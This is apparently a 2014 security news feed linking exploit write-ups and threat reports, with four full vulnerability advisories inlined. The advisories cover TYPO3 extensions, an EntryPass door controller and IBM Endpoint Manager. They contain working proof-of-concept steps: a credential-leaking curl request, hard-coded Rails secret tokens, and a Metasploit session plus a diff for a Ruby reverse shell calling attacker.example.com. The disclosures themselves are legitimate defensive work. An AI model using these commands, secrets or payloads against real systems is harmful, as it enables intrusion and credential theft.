November 30, 2014, 1:51 pm
TL;DR I use a race condition to upload two avatars at the same time to exploit another Paperclip bug and get remote code execution on Apache+Rails stacks. I believe many file uploaders are vulnerable to this.
more here.........http://homakov.blogspot.gr/2014/11/hacking-file-uploaders-with-race.html
![]()
↧
November 30, 2014, 1:53 pm
This tutorial will cover several techniques that can be used to gain persistent access to Windows machines. Usually this doesn't enter into play during a pentest (with the exception of red team engagements) as there is no benefit to adding it to the scope of the project. That is not to say it is not an interesting subject, both from a defensive and offensive perspective.
more here...........http://www.fuzzysecurity.com/tutorials/19.html
![]()
↧
↧
December 1, 2014, 3:22 am
New vulnerabilities for old operating systems may not seem particularly interesting, until you consider the large number of legacy machines running outdated versions of Windows. Windows XP has reached it’s end of life, meaning that new vulnerabilities will not be patched. In this post. we will show that a recent vulnerability can be used as a platform for exploiting Windows XP.
more here.........http://blogs.cisco.com/security/talos/ms14-063-a-potential-xp-exploit
![]()
↧
December 1, 2014, 3:23 am
Finally after one of year I’m releasing two new codes. I worked on them originally to contribute to DC issue 6, but things have turned rather complicated with the zine so far. I worked on them on rather exceptional circumstances, almost no available material, bad internet connection, no resources, and worst of all: little computer access and almost no time. After a few setbacks on my original plans, I had to cut them short for simplicity. But they are fit for release. So, with no further delay, here some descriptions.
more here.............http://villekullah.tumblr.com/post/104057844668/hauhra-and-hildr-release
![]()
↧
December 1, 2014, 3:24 am
So we’re back, ready to run through an additional step into our Verisure Wireless alarm journey. This post is the second chapter of my Verisure story where we’ll learn how to extract and dig into firmwares. Getting firmware out of the memory will actually help us to grab various AES keys, a required step to decrypt both radio and ethernet communications, but also authenticating against the local console using USB connector (this will be described in part 3).
more here.........http://funoverip.net/2014/12/reverse-engineer-a-verisure-wireless-alarm-part-2-firmwares-and-crypto-keys/
![]()
↧
↧
December 1, 2014, 3:27 am
A "How'd that malware get there?" tool for OS X
more here..........https://github.com/Yelp/osxcollector
![]()
↧
December 1, 2014, 3:50 am
One of the many ways to look for Exploit Kit/drive-by behavior
more here.........https://github.com/sooshie/bro-scripts/tree/master/exploitkit
![]()
↧
December 1, 2014, 6:17 am
FireEye is currently tracking a group that
targets the email accounts of individuals
privy to the most confidential information of
more than 100 companies. The group, which we
call FIN4, appears to have a deep familiarity with
business deals and corporate communications, and
their effects on financial markets. Operating since at
least mid-2013, FIN4 distinctly focuses on
compromising the accounts of individuals who
possess non-public information about merger and
acquisition (M&A) deals and major market-moving
announcements, particularly in the healthcare and
pharmaceutical industries.
more here...........https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-fin4.pdf
![]()
↧
December 1, 2014, 6:20 am
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdfDuring a penetration test RedTeam Pentesting discovered a remote codeexecution vulnerability in the TYPO3 extension ke_dompdf, which allowsattackers to execute arbitrary PHP commands in the context of thewebserver.Details=======Product: ke_dompdf TYPO3 extensionAffected Versions: 0.0.3<=Fixed Versions: 0.0.5Vulnerability Type: Remote Code ExecutionSecurity Risk: highVendor URL: http://typo3.org/extensions/repository/view/ke_dompdfVendor Status: fixed version releasedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007Advisory Status: publishedCVE: CVE-2014-6235CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235Introduction============"DomPDF library and a small pi1 to show how to use DomPDF to render thecurrent typo3-page to pdf."(taken from the extension's description)More Details============The TYPO3 extension ke_dompdf contains a version of the dompdf libraryincluding all files originally supplied with it. This includes anexamples page, which contains different examples for HTML-entitiesrendered as a PDF. This page also allows users to enter their own HTMLcode into a text box to be rendered by the webserver using dompdf.dompdf also supports rendering of PHP files and the examples page alsoaccepts PHP code tags, which are then executed and rendered into a PDFon the server.Since those files are not protected in the TYPO3 extension directory,anyone can access this URL and execute arbitrary PHP code on the system.This behaviour was already fixed in the dompdf library, but the typo3extension ke_dompdf supplies an old version of the library that stillallows the execution of arbitrary PHP code.Proof of Concept================Access examples.php on the vulnerable system:http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.phpEnter PHP code in the text box on the bottom of the page and click thesubmit button, for example:------------------------------------------------------------------------<?php phpinfo() ?>------------------------------------------------------------------------The page will return a PDF file containing the output of the PHP code.Workaround==========Remove the directory "www" containing the examples.php file or at leastthe examples.php file from the extensions' directory.Fix===Update to version 0.0.5 of the extension.Security Risk=============highTimeline========2014-04-21 Vulnerability identified2014-04-30 Customer approved disclosure to vendor2014-05-06 CVE number requested2014-05-10 CVE number assigned2014-05-13 Vendor notified2014-05-20 Vendor works with TYPO3 security team on a fix2014-09-02 Vendor released fixed version [2]2014-12-01 Advisory releasedReferences==========The TYPO3 extension ke_dompdf contains an old version of the dompdflibrary, which contains an example file that can be used to executearbitrary commands. This vulnerability was fixed in dompdf in 2010. Therelevant change can be found in the github repository of dompdf:[1] https://github.com/dompdf/dompdf/commit/ e75929ac6393653a56e84dffc9eac1ce3fb90216TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/ typo3-ext-sa-2014-010/RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests, short pentests,performed by a team of specialised IT-security experts. Hereby, securityweaknesses in company networks or products are uncovered and can befixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found athttps://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen ![]()
↧
↧
December 1, 2014, 6:24 am
Advisory: Information Disclosure in TYPO3 Extension ke_questionnaireThe TYPO3 extension ke_questionnaire stores answered questionnaires in apublicly reachable directory on the webserver with filenames that areeasily guessable.Details=======Product: ke_questionnaireAffected Versions: 2.5.2 (possibly all versions)Fixed Versions: unknownVulnerability Type: Information DisclosureSecurity Risk: mediumVendor URL: http://kequestionnaire.kennziffer.com/Vendor Status: notifiedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-009Advisory Status: publishedCVE: CVE-2014-8874CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8874Introduction============"The TYPO3 extension kequestionnaire allows to easily and quickly createand evaluate individual questionnaires online in any TYPO3 website."(translated from the official website of ke_questionnaire)More Details============Files containing the answered questionnaires are stored in the"typo3temp" directory within the TYPO3 installation. As the source codeof the ke_questionnaire extension shows, the filename of an answeredquestionnaire is solely based on the questionnaire ID and the user ID ofthe user who created the questionnaire.Source code (shortened):------------------------------------------------------------------------------function init() { global $BE_USER,$LANG,$BACK_PATH,$TCA_DESCR,$TCA,$CLIENT,$TYPO3_CONF_VARS; $this->temp_file = \'tx_kequestionnaire_temp_'.$this->q_id.'_'.$GLOBALS['BE_USER']->user['uid']; [...]}[...]function createSchedulerTask(){ $myVars = $GLOBALS['BE_USER']->getSessionData('tx_kequestionnaire'); $file_path = PATH_site.'typo3temp/'.$this->temp_file; [...]}------------------------------------------------------------------------------A valid URL that returns the answers to a questionnaire could look likethe following:http://www.example.com/typo3temp/tx_kequestionnaire_temp_15999_7Proof of Concept================Using the tool wfuzz[1] it is possible to search for answers toquestionnaires on a TYPO3 site that employs ke_questionnaire:------------------------------------------------------------------------$ python wfuzz.py -c -z range,14000-15000 -z range,1-10 --hc 301 \ http://example.com/typo3temp/tx_kequestionnaire_temp_FUZZ_FUZ2Z------------------------------------------------------------------------Workaround==========The webserver config should deny access to answered questionnaire files,for example by adding an .htaccess file that limits access totx_kequestionnaire_* files (this may hinder online evaluation of thequestionnaires).Fix===No official fix available.Security Risk=============Depending on the questions in the questionnaire the answeredquestionnaires may contain personal information including participants'full names, addresses and so on. The risk therefore strongly depends onthe information supplied in the questionnaires. Since this informationwill at least often contain email addresses, it is rated as at least amedium risk.Timeline========2014-04-21 Vulnerability identified2014-04-30 Customer approved disclosure to vendor2014-05-13 Vendor notified2014-05-20 Vendor works with TYPO3 security team on a fix2014-06-15 Vendor releases updated version which according to them does not fix the issue2014-10-08 TYPO3 security team says the issue is still unresolved2014-11-04 Vendor continues to release updated versions, no response whether the security issue is fixed2014-11-14 CVE number assigned2014-12-01 Advisory releasedReferences==========[1] https://code.google.com/p/wfuzz/RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests, short pentests,performed by a team of specialised IT-security experts. Hereby, securityweaknesses in company networks or products are uncovered and can befixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found athttps://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen ![]()
↧
December 1, 2014, 6:30 am
Advisory: EntryPass N5200 Credentials DisclosureEntryPass N5200 Active Network Control Panels allow the unauthenticateddownloading of information that includes the current administrativeusername and password.Details=======Product: EntryPass N5200 Active Network Control PanelAffected Versions: unknownFixed Versions: not availableVulnerability Type: Information Disclosure, Credentials DisclosureSecurity Risk: highVendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200Vendor Status: notifiedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011Advisory Status: publishedCVE: CVE-2014-8868CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868Introduction============"EntryPass Active Networks are designed to enhance highly customized andrapid 'real-time' changes to the underlying network operation.Brilliantly engineered with all the power you need to enablecode-sending, minus unnecessary buffer time with its distributedarchitecture capable of processing access demand at the edge levelwithout leveraging at the server end."(From the vendor's home page)More Details============EntryPass N5200 Active Network Control Panels offer an HTTP service onTCP port 80. It appears that only the first character of a requestedURL's path is relevant to the web server. For example, requesting theURLhttp://example.com/1styles.cssyields the same CSS file as requesting the following URL:http://example.com/1redteamBy enumerating all one-character long URLs on a device, it wasdetermined that URLs starting with a numeric character are used by theweb interface, as listed in the following table: http://example.com/0 Index http://example.com/1 Stylesheet http://example.com/2 Authentication with Username/Password http://example.com/3 Session Management http://example.com/4 Device Status http://example.com/5 Progressbar Image http://example.com/6 Reset Status http://example.com/7 Login Form http://example.com/8 HTTP 404 Error Page http://example.com/9 JavaScriptFor URLs starting with non-numeric characters, an HTTP 404 - Not Founderror page is normally returned. Exceptions to this rule are URLsstarting with the lower case letters o to z and the upper case letters Ato D. When requesting these URLs, memory contents from the device appearto be returned in the server's HTTP response.As highlighted in the following listing, both the currently set usernameADMIN and the corresponding password 123456 are disclosed in the memorycontents when requesting the URL http://example.com/o:$ curl -s http://example.com/o | hexdump -C | head[...]0010 XX XX XX XX XX XX XX XX XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e|0020 6e 74 72 79 70 61 73 73 2e 6e 65 74 00 00 00 00 |ntrypass.net....|[...]0060 XX XX XX XX XX XX XX XX XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&|0070 20 20 31 32 33 34 35 36 26 20 XX XX XX XX XX XX | 123456& XXXXXX|[...]These credentials grant access to the administrative web interface ofthe device when using them in the regular login form.Similarly, it is possible to get the status output of the device withoutprior authentication by simply requesting the following URLhttp://example.com/4The server responds to the request with the following XML data, whichcontains information about various different settings of the device.<html><head><title>Device Server Manager</title></head><body><serial_no>XXXXXXXXXXXX-XXXX</serial_no><firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version><mac_address>XX-XX-XX-XX-XX-XX</mac_address><disable_reporting>disabled</disable_reporting><commit_setting>checked</commit_setting><user_id>ADMIN</user_id><user_pass>******</user_pass>[...]</body></html>Proof of Concept================------------------------------------------------------------------------$ curl -s http://example.com/o | hexdump -C | head------------------------------------------------------------------------Workaround==========Access to the web interface should be blocked at the network layer.Fix===Not available.Security Risk=============Attackers with network access to an EntryPass N5200 Active NetworkControl Panel can retrieve memory contents from the device. These memorycontents disclose the currently set username and password needed toaccess the administrative interface of the device. Using thesecredentials, it is possible to read the device's current status andconfiguration, as well as modify settings and install firmware updates.With regards to the device itself, this vulnerability poses a high risk,as it allows attackers to gain full control. The actual operational riskdepends on how the device is used in practice.Timeline========2014-05-19 Vulnerability identified2014-08-25 Customer approved disclosure to vendor2014-08-27 Vendor contacted, security contact requested2014-09-03 Vendor contacted, security contact requested2014-09-15 Vendor contacted, vulnerability reported2014-09-17 Update requested from vendor, no response2014-10-15 No response from vendor. Customer discontinued use of the product and approved public disclosure2014-10-20 Contacted vendor again since no fix or roadmap was provided.2014-10-28 CVE number requested2014-11-14 CVE number assigned2014-12-01 Advisory releasedRedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests, short pentests,performed by a team of specialised IT-security experts. Hereby, securityweaknesses in company networks or products are uncovered and can befixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found athttps://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen ![]()
↧
December 1, 2014, 9:29 am
Assuming that time enough has happened since the security update was released by Wordpress and Drupal, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before.
more here...........http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html
![]()
↧
December 1, 2014, 9:31 am
CF9-10 Remote Root Zeroday
more here........http://downloads.securityfocus.com/vulnerabilities/exploits/59773.py
![]()
↧
↧
December 2, 2014, 3:07 am
Inspired by Nikolay Elenkov’s detailed technical posts on Android Explorations, I decided to dig into the Android source code myself and document the package verification mechanism in Android.
more here..........https://irq5.io/2014/12/01/android-internals-package-verifiers/
![]()
↧
December 2, 2014, 4:12 am
I’ve spent a lot of time this year thinking about networking, the web, and security on the Internet. Since the Snowden leaks, revelations about the scale and sophistication of government cyberweapons have the public talking about the danger of metadatacollection. In response, I began to wonder how easy it would be for any would-be adversary to perform a practical collection attack on a standard WiFi network. In order to judge the difficulty for myself, I decided it was time to dabble in the Dark Arts.
more here...........http://blog.nodenexus.com/2014/11/28/a-shark-on-the-network/
![]()
↧
December 2, 2014, 6:50 am
Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management ComponentsDuring a penetration test, RedTeam Pentesting discovered that severalIBM Endpoint Manager Components are based on Ruby on Rails and usestatic secret_token values. With these values, attackers can createvalid session cookies containing marshalled objects of their choosing.This can be leveraged to execute arbitrary code when the Ruby on Railsapplication unmarshals the cookie.Details=======Product: IBM Endpoint Manager for Mobile DevicesAffected Components: Enrollment and Apple iOS Management Extender, Mobile Device Management Self-Service Portal, Mobile Device Management Admin Portal and Trusted Service ProviderAffected Versions: All versions prior to 9.0.60100Fixed Versions: 9.0.60100Vulnerability Type: Unauthenticated Remote Code ExecutionSecurity Risk: highVendor URL: http://www-03.ibm.com/software/products/en/ibmendpmanaformobidevi http://www-01.ibm.com/support/docview.wss?uid=swg21691701Vendor Status: fixed version releasedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-012Advisory Status: publishedCVE: CVE-2014-6140CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6140Introduction============"IBM Endpoint Manager for Mobile Devices provides a completely integratedapproach for managing, securing, and reporting on laptops, desktops,servers, smartphones, tablets, and even specialty devices such aspoint-of-sale terminals. This provides customers with unprecedentedreal-time visibility and control over all devices employees use in theirdaily job functions; reducing costs, increasing productivity, andimproving compliance."(from the vendor's homepage)More Details============IBM Endpoint Manager for Mobile Devices is part of the IBM EndpointManager (IEM, formerly Tivoli Endpoint Manager, or TEM) product family.Several components related to mobile device management can be installedeither on the main TEM Server, or on so-called TEM Relays, and are thenaccessible via HTTPS at port 443 of the respective system, such as: Path Component / Enrollment and Apple iOS Management Extender /ssp/ Mobile Device Management Self-Service Portal /ap/ Mobile Device Management Admin Portal /tsp/ Trusted Service ProviderWhen issuing HTTP requests to any of these paths, the respective serverresponds in a manner similar to the following example:$ curl -skI https://tem.example.com/HTTP/1.1 200 OKContent-Type: text/html;charset=UTF-8X-UA-Compatible: IE=Edge,chrome=1[...]Set-Cookie: _mdm_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjU wODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkk iMTQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ 9BjsARg%3D%3D--e48265ee63dd90381caa92248d27162f67b1ea06; path=/; secure; HttpOnly[...]X-Rack-Cache: missContent-Length: 0Server: Jetty(8.1.14.v20131031)While the Server header indicates that the web applications are hostedon a Jetty Java application server, the X-Rack-Cache header and thecookie format are typically used by Ruby on Rails applications. Thecookie is in fact a Base64 encoded marshalled Ruby object protected byan HMAC (the hexadecimal value following the two dashes). The cookievalue can be unmarshalled as follows:$ ruby -e 'puts Marshal.load("BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZj'\'YTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiM'\'TQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg==".'\'unpack("m0")[0])'{"session_id"=>"8cf6ca2165088581b161cafa0a604837", "_csrf_token"=>"46KewnSgCW1xjZ7XR3HK265eAiOmkl1o/daRN5x3v94="}To create a cookie with a valid HMAC requires knowledge of a secretstored on the application server. In Ruby on Rails version 3applications, this value is normally stored in the variable secret_tokenthat is set in the file config/initializers/secret_token.rb. It is goodpractice to generate these values randomly when an application isinstalled. The IBM Endpoint Manager components, however, use staticvalues that are the same across all installations. These values can bedetermined by manually inspecting the web application archives (e.g.ap.war, ios.war, ssp.war, tsp.war) installed into the directoryC:\Program Files\BigFix Enterprise\Management Extender\MDM Provider\webappsof the respective server. The Enrollment and Apple iOS ManagementExtender, for example, is contained in the file ios.war. The archivecontains a Ruby on Rails web application that was compiled to Java classfiles. The secret token needed for calculating the HMAC is contained inthe file WEB-INF/config/initializers/secret_token.class:$ strings WEB-INF/config/initializers/secret_token.class \ | egrep -o '[0-9a-f]{128}'65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365It can be verified that this secret is used for generating the HMAC thatprotects the cookie value by using the OpenSSL command line utility tocalculate an HMAC of the aforementioned Base64 encoded data:$ echo -n 'BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUwODg1ODFiMT'\'YxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNnQ1cxeG'\'paN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg=='\ | openssl dgst -sha1 -hmac '65c0eb133b2c8481b08b41cfc0969cbdd540f3c1'\'ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd'\'4895a4e2805712fa6365'(stdin)= e48265ee63dd90381caa92248d27162f67b1ea06The resulting value is identical to the HMAC originally appended to thecookie. Once the secret is known, arbitrary cookie values can be craftedand sent to the respective application for further processing. Asdemonstrated by Metasploit's rails_secret_deserialization exploitmodule[0], this can be leveraged into executing arbitrary code on theapplication server (see also Proof of Concept below).For reference, the following cookie names and secret_token values wereidentified for the different web applications:Enrollment and Apple iOS Management ExtenderPath: /Cookie: _mdm_sessionSecret: 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730 d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365Mobile Device Management Self-Service PortalPath: /ssp/Cookie: _self-service-portal_sessionSecret: c5f5da7e3ae1baa9a10f4429b5e7c8aec217b3b53851272bd8f533d47acade48 0863a810630039c7987b04ff70c125512e74a998f8a028080c05265a97c747a3Mobile Device Management Admin PortalPath: /ap/Cookie: _admin-portal_sessionSecret: 2556dea5fbbd90c4a79202a43bdf9bd4c391c67159d021ea8bc478f29801d024 78acb273c2f425cf487c27669af5dbc3fdaf7f870e23a0a544dee04ab2169220Trusted Service ProviderPath: /tsp/Cookie: _trusted-services-provider_sessionSecret: b52a3979462299e3a11f6c7c893a980f312fa8e5944fb8fdc74a400c55677aed ba00ce6df9e2d9ef1525c6ab68a2b6dca9e9ba557c0c6d579a1325ec6338178bExploiting the Trusted Service Provider application was not tested, dueto the lack of a properly configured testing environment. However, it isa Ruby on Rails web application deployed to the Jetty application serverjust like the other applications so that it is likely also vulnerable.This was confirmed by the vendor.Proof of Concept================The following listing shows a sample Metasploit session demonstratingthe execution of arbitrary code through the Enrollment and Apple iOSManagement Extender application:------------------------------------------------------------------------msf > use exploit/multi/http/rails_secret_deserializationmsf exploit(rails_secret_deserialization) > set PAYLOAD ruby/shell_reverse_tcpPAYLOAD => ruby/shell_reverse_tcpmsf exploit(rails_secret_deserialization) > set LHOST attacker.example.comLHOST => attacker.example.commsf exploit(rails_secret_deserialization) > set RHOST tem.example.comRHOST => tem.example.commsf exploit(rails_secret_deserialization) > set RPORT 443RPORT => 443msf exploit(rails_secret_deserialization) > set SSL trueSSL => truemsf exploit(rails_secret_deserialization) > set SSLVERSION TLS1SSLVERSION => TLS1msf exploit(rails_secret_deserialization) > set SECRET 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365SECRET => 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365msf exploit(rails_secret_deserialization) > set PrependFork falsePrependFork => falsemsf exploit(rails_secret_deserialization) > exploit[*] Started reverse handler on attacker.example.com:4444[*] Checking for cookie[*] Adjusting cookie name to _mdm_session[+] SECRET matches! Sending exploit payload[*] Sending cookie _mdm_session[*] Command shell session 1 opened (attacker.example.com:4444 -> tem.example.com:50169) at 2014-08-15 13:37:31 +0200cmd.exe /c verwhoamiMicrosoft Windows [Version 6.1.7601]nt authority\system------------------------------------------------------------------------The following changes needed to be applied to the Metasploit Frameworkto be able to exploit the issue. Most of them were required to addresspeculiarities of the Java/JRuby environment, such as the lack of supportfor Kernel.fork():------------------------------------------------------------------------diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rbindex 7803dd5..e72d8c2 100644--- a/modules/exploits/multi/http/rails_secret_deserialization.rb+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb@@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote #- # This stub ensures that the payload runs outside of the Rails process- # Otherwise, the session can be killed on timeout+ # This stub tries to ensure that the payload runs outside of the Rails+ # process Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first- if RUBY_PLATFORM =~ /mswin|mingw|win32/- inp = IO.popen("ruby", "wb") rescue nil- if inp- inp.write(code)- inp.close- end+ if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") rescue nil)+ inp.write(code)+ inp.close else- Kernel.fork do+ def _fork+ begin+ Kernel.fork+ rescue NotImplementedError+ -1+ end+ end+ pid = _fork+ if 0 == pid or -1 == pid eval(code) end end@@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => datastore['HTTP_METHOD'], }, 25) if res && !res.get_cookies.empty?- match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)+ match = res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/) end if matchdiff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rbindex f17c669..0100929 100644--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb@@ -37,8 +37,31 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)- "require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" +- "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" +- "(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }"+ ruby = <<-EOF+require 'socket'+c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i})+def reopen(old, new)+ begin+ old.reopen(new)+ rescue IOError => e+ new+ end+end++$stdin = reopen($stdin, c)+$stdout = reopen($stdout, c)+$stderr = reopen($stderr, c)+$stdin.each_line{ |l| l=l.strip++ next if l.length==0++ (IO.popen(l,"rb") { |fd|+ fd.each_line { |o|+ c.puts(o.strip)+ }+ }) rescue nil+}+ EOF+ ruby end end------------------------------------------------------------------------Workaround==========It might be possible to binary patch the Java class files to use adifferent secret_token value and redeploy the application. This isuntested, however.Fix===Install version 9.0.60100 of the affected software components.Security Risk=============The vulnerability allows unauthenticated remote attackers to executearbitrary code with administrative privileges on the affected systems.It is highly likely that a successful attack on the application servercan also be leveraged into a full compromise of all devices managedthrough the product. This constitutes a high risk.Timeline========2014-07-29 Vulnerability identified during a penetration test2014-08-06 Customer approves disclosure to vendor2014-08-15 Vendor notified, vendor acknowledges receiving the advisory2014-09-03 Update requested from vendor2014-09-05 Vendor promises to respond with more details2014-09-26 Update requested from vendor2014-09-30 Vendor promises to respond with more details2014-10-16 Update requested from vendor2014-10-16 Vendor responds with CVE-ID, plans release for mid-November2014-11-06 More definite release schedule requested2014-11-12 Vendor plans release for last week of November2014-11-21 Additional details requested from vendor2014-11-22 Vendor responds with details, postpones release to mid-December due to issues discovered during quality control2014-12-01 Vendor announces imminent release2014-12-01 Vendor releases security bulletin and software upgrade2014-12-02 Customer approves public disclosure2014-12-02 Advisory releasedReferences==========[0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rbRedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests, short pentests,performed by a team of specialised IT-security experts. Hereby, securityweaknesses in company networks or products are uncovered and can befixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found athttps://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen ![]()
↧
December 2, 2014, 9:45 am
I was reading the blog at beyondtrust and decided to check if Journal was really an easy target.
Behold, multiple exploitable looking crashes in a couple of minutes of mutation!
more here........http://pastebin.com/8Q9kkcwc
![]()
↧
↧
December 2, 2014, 9:47 am
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell
here.........https://gist.github.com/worawit/84ab41358b8465966224
![]()
↧
December 2, 2014, 9:49 am
A new global cyber power has emerged; one that has already compromised some of the world’s most critical infrastructure. The Operation Cleaver report sheds light on the efforts of a coordinated and determined group working to undermine the security of at least 50 companies across 15 industries in 16 countries. Our report unveils the tactics, techniques and procedures used in what it still an ongoing campaign.
more here.........http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf
![]()
↧
December 2, 2014, 2:44 pm
The ELK stack is a set of analytics tools. Its initials represent Elasticsearch, Logstash and Kibana. Elasticsearch is a flexible and powerful open source, distributed, real-time search and analytics engine. Logstash is a tool for receiving, processing and outputting logs, like system logs, webserver logs, error logs, application logs and many more. Kibana is an open source (Apache-licensed), browser-based analytics and search dashboard for Elasticsearch.
more here.........http://blogs.cisco.com/security/step-by-step-setup-of-elk-for-netflow-analytics
![]()
↧